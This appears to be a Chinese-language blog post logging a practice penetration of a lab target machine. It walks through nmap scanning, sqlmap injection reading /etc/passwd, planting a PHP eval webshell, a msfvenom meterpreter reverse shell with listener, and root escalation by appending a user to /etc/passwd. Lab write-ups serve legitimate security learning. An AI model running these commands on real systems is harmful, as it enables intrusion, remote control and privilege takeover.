记录一次靶机经过

最新推荐文章于 2024-07-01 15:45:42 发布
最新推荐文章于 2024-07-01 15:45:42 发布
阅读量4k 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51524455/article/details/123671036
版权

(1)扫描靶机ip

namp -sP ip/24

找出靶机ip

(2)拿到靶机ip扫描存活端口

nmap -sS -sV -T4 -A -p- ip

-sS(使用SYN进行扫描)

-sV(探测开启的端口来获取服务、版本信息)

-T4(数字越大,nmap扫描速度越快)

-A(一次扫描包含系统探测、版本探测、脚本扫描和跟踪扫描)、

(3)用drib或者dirsearch目录爆破

寻找①网站文件路径②敏感目录文件

(4)访问文件路径,看看网站的服务是什么,如果是数据库查询可以利用sqlmap注入

(5)bp抓包,保存文件(命名为uid.txt),利用slqmap扫描

sqlmap -r uid.txt --dbs(后续-D -T -C查看详细信息)

突破点:

①sqlmap -r uid.txt --file-read="/etc/passwd"(尝试读取passwd信息)

②sqlmap -r uid.txt --sql-shell

sql-shell> select @@datadir(获取数据库保存数据的位置)

③再次尝试读取/etc/passwd

sql-shell>

select load_file('/etc/passwd')

(6)php网站,可以寻找phpinfo文件的位置(存在网站物理路径)

存在文件上传的网站可能有写入权限

(7)在mysql写入webshell

①into outfile写入

sqlmap -r uid.txt --sql-query='select "<?php @eval($_POST[cmd]); ?>" INTO OUTFILE "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php"'

②--file-dest写入

先用msfvenom生成木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=1234 R > shell.php

生成的木马记得打开删除前面的两个字符/*

(如果远程存在该文件,则无法写入。)

使用msfvenom接收反弹shell

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.108
set lport 1234
run

最后访问http://靶机IP/se3reTdir777/uploads/webshell.php进行shell反弹。

跳出meterpreter>       输入shell即可

接下来涉及linux提权,暂时没有学习,以后记录

随笔:

>perl -le ‘print "hello world"'

hello world

需要学习:

①收集靶机内核版本uname -a

searchsploit linux 4.15

②SUID提权

③添加用户名密码到/etc/passwd

www-data用户具有/etc/passwd的可写权限。添加一个用户到/etc/passwd文件中

perl -le 'print crypt("Ai:Web:1.0","salt")'
echo "ins1ght:saPxWonD/gnR6:0:0:hacker:/root:/bin/bash" >> /etc/passwd
cat /etc/passwd | grep ins1ght

ins1ght
使用su ins1ght切换账户,密码是Ai:Web:1.0
 

没事早点睡觉
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Qt工作笔记-QHash与QMap查找速度粗略比较实战
IT1995的博客
06-29 8492
因为工作需要,要大量用到查找,关于查找,在Qt中比较常用的就两个,一个QHash,一个QMap,关于谁快,谁慢,官方已经给出了答案但我们来实战下,因为时间复杂度的多少,在真实运行情况下有的时候,差距并不是特别大。影响速度的条件有很多,其中就有数据量少,但这仅仅是其中的一个。下面的实验是从15万的数据中,查找指定的9999条数据,看看谁快!下面是初始化运行:一种是找到指定数据后,输出,的情况(模拟项...
OWASP靶机安全学习、测试
05-24
OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
安装部署Web安全测试用的靶机
11-24
个人作业,希望有所帮助
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
WEB攻防【5】——JS项目/Node.js框架安全/识别审计/验证绕过
weixin_42090431的博客
06-27 390
JS开发的WEB应用和PHP、java.NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。网站检查网络下面加载了哪些js文件、以及js文件里面有没有嵌套别的js文件。一般有/static/js/app.j8 等顺序的js文件。2、开发框架-Vulhub-Node.JS安全。3、真实应用-APP应用直接重置密码。4、真实应用-违法彩彩文件上传安全。1、原生JS&开发框架-安全条件。4、如何获取更多的Js文件?2、流行的Js框架有那些?3、如何判定Js开发应用?5、如何快速获取价值代码?
C++实现简化版Qt信号槽机制(2):增加内存安全保障
hebhljdx的博客
06-28 1260
在上一篇文章中《C++实现一个简单的Qt信号槽机制》,我们基于前面的反射代码实现了信号槽的功能。 但是上一篇的代码中没有对象生命周期管理的机制,如果在对象的生命周期结束后还存在未断开的信号和槽连接,那么信号触发时可能会尝试访问已经被析构的对象,从而引发内存访问异常。 方案的确定 在Qt框架中,QObject的析构函数,在对象销毁时会自动断开所有信号和槽的连接。从而避免出现这种情况。 笔者考虑了一下,没有采取这种方案,因为: 这会要求信号和槽两个对象互相存储双方的连接情况,在一定程度上浪费了内存。 另一方面
VUE项目安全漏洞扫描和修复
qq_33225414的博客
06-27 374
它是通过分析 package-lock.json 文件,继而扫描我们的包分析是否包含漏洞的。3、npm audit命令将项目中配置的依赖项的描述提交到默认注册中心,并要求提供已知漏洞的报告。如果发现任何漏洞,则将计算影响和适当的补救措施。1、npm audit是npm 6 新增的一个命令,可以允许开发人员分析复杂的代码并查明特定的漏洞。4、启动服务,不出意外的话,vue.config.js 的配置会有报错。1.扫描你的项目的漏洞,只显示细节,不修复任何东西。如果没有发现漏洞,该命令将以0退出。
聚焦从业人员疏散逃生避险意识能力提升,推动生产经营单位每年至少组织开展(疏散逃生演练,让全体从业人员熟知逃生通道、安全出口及应急处置要求,形成常态化机制。
dike8989的博客
06-27 986
万某、姚某、徐某3人被某劳务派遣公司派遣到一家公司工作一天公司为从业人员发放劳动防护用品,但没有给他们3人发公司负责人安某告诉他们说,由于你们没有建立劳动关系,不是正式员工,按照国家规定由劳务派遣单位为你们提供劳动防护用品徐某和他辩论说:“不对,你们应当把我们和其他人一样对待,提供劳动防护用品“见两人争执不下,万某劝徐某说:“算了,咱就是个临时工,不给咱发也说得过去”姚某说:“不给咱发也行,咱就干活几拿钱,他们那些规章制度咱也不用听“以上人员说法正确的是()。A.徐某B.万某C.姚某。
【计算机网络】HTTPS——更安全的HTTP通信(个人笔记)
weixin_62679382的博客
06-26 1130
在中,我们已经知道了网页是怎么打开的,HTTP确实是一个相当优秀和方便的协议,但HTTP也有很多不足,最严重的不足就是——不安全。我们来举个比较生动的例子,HTTP协议通信就是你坐在教室最左边,想把纸条传给你最右边的好哥们,叫他放学超光速去操场抢个篮板,显然你要通过一堆同学把你的纸条递过去。
Java中的数据加密与安全传输
weixin_44626980的博客
07-01 343
通过本文的介绍,我们展示了如何在Java中实现数据加密和安全传输。我们介绍了常用的加密算法,包括对称加密(AES)、非对称加密(RSA)和消息摘要(SHA-256)。此外,我们还展示了如何使用SSL/TLS协议实现数据的安全传输。数据加密和安全传输是保护敏感信息的关键技术,希望这些内容对大家有所帮助,能够在实际项目中应用并提高系统的安全性。随着互联网的普及和网络安全问题的日益严重,数据加密和安全传输变得尤为重要。在Java中,我们可以使用多种方法和库来实现数据加密和安全传输,以保护敏感信息不被窃取和篡改。
全球视角下的AI安全挑战:面向未来的准备
CCSA2018的博客
06-27 1173
在全球科技创新的洪流中,人工智能(AI)无疑是最引人瞩目的浪尖。随着OpenAI、谷歌DeepMind、微软等科技巨头相继发布其在AI安全领域的最新进展,一场围绕AI安全的全球对话正悄然升级。这些举措不仅揭示了当前AI安全技术的最前沿,也预示着面向未来,构建安全、可靠、负责任的AI生态体系已经成为国际共识。
基于振弦采集仪的工程安全监测技术研究与应用
duxi222333的博客
06-26 531
它可以实时、准确地监测结构物的振动和变形情况,及时发现问题并采取相应的措施,保证工程的安全运行。振弦采集仪可以通过监测隧道的振动和变形情况,及时发现隧道的变形和破坏问题,采取措施进行修复,保证隧道的安全运行。振弦采集仪可以通过监测桥梁的振动、变形等参数,判断桥梁的健康状态,预测潜在的问题,并采取相应的维修措施,保证桥梁的安全运行。工程安全监测的目的是保证工程的安全运行,预防事故的发生,保护人们的生命财产安全。振弦采集仪可以通过监测地基的振动情况,及时发现地基沉降问题,采取相应的补救措施,保证工程的安全性。
自主可控的芯片设计供应链软件:保障芯片产业安全的关键
YouyuanXway的博客
06-27 486
在当前的科技浪潮中,芯片作为信息技术的核心,其设计、制造和供应链的安全性和自主可控性显得尤为重要。而自主可控的芯片设计供应链软件,正是保障这一产业链安全的关键环节。
安全隔离上网的有效途径:沙箱
最新发布
Canon_YK的博客
07-01 455
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
动态应用安全测试 (DAST) 与渗透测试:应用程序安全测试综合指南
网络研究观
06-30 834
本综合指南将探讨 DAST 与渗透测试,包括 DAST 扫描与渗透测试以及 SAST、DAST 和渗透测试之间的关系。
如何使用sr2t将你的安全扫描报告转换为表格格式
FreeBuf_的博客
06-26 1123
sr2t是一款针对安全扫描报告的格式转换工具,全称为“Scanning reports to tabular”,该工具可以获取扫描工具的输出文件,并将文件数据转换为表格格式,例如CSV、XLSX或文本表格等,能够为广大研究人员提供一个可读的表格格式数据。当前版本的sr2t支持处理下列工具生成的安全扫描报告:由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新版本的Python 3环境。接下来,广大研究人员可以直接使用pip命令下载并安装sr2t: pip install --us
第三方服务提供商的五大风险
网络研究观
06-26 1118
为什么第三方风险管理很重要?
怎么做一个windows服务器系统靶机
05-14
要制作一个Windows服务器系统的靶机,你可以按照以下步骤进行: 1. 下载Windows Server操作系统ISO文件,可以从官方网站或其他可靠来源下载。 2. 安装虚拟机软件,例如VMware Workstation或VirtualBox。 3. 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值